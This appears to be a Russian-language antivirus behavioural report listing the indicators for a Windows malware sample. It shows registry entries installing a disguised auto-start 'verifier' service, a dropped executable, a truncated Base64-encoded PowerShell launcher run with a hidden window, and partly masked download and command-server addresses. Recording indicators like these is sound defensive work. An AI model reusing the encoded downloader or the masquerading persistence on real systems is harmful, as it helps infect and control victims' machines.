Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\verifier] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\verifier] 'ImagePath' = '"%WINDIR%\SysWOW64\KBDJPN\verifier.exe"'
- 'verifier' "%WINDIR%\SysWOW64\KBDJPN\verifier.exe"
- 'verifier' %WINDIR%\SysWOW64\KBDJPN\verifier.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABGADIAZAByADQAdAB0AD0AKAAoACcAUgBwADQAJwArACcAdwA1ACcAKQArACcAbwAnACsAJwBiACcAKQA7ACQARABjADMAeQBnAHgAbgA9ACQARgB3AGkANQAzAGkAdQAgACsAIABbAGMAaABhAHIAXQAoADEAIAArACAAMQ...
- %HOMEPATH%\bh2dez5\obl3adb\rmrfi2g4_.exe
- %WINDIR%\syswow64\kbdjpn\verifier.exe
- %HOMEPATH%\bh2dez5\obl3adb\rmrfi2g4_.exe в %WINDIR%\syswow64\kbdjpn\verifier.exe
- '22#.#47.142.214':80
- http://th####seofpeace.org/cgi-bin/NZdfyylt/
- http://22#.#47.142.214/Q6JJv1UCdl9x/Q9hlXAd6t6jcV3/MQ1MQhabQ/164o/V3Pqr7pgQdNbeh/
- DNS ASK th####seofpeace.org
- '%HOMEPATH%\bh2dez5\obl3adb\rmrfi2g4_.exe'
- '%WINDIR%\syswow64\kbdjpn\verifier.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABGADIAZAByADQAdAB0AD0AKAAoACcAUgBwADQAJwArACcAdwA1ACcAKQArACcAbwAnACsAJwBiACcAKQA7ACQARABjADMAeQBnAHgAbgA9ACQARgB3AGkANQAzAGkAdQAgACsAIABbAGMAaABhAHIAXQAoADEAIAArACAAMQ...' (со скрытым окном)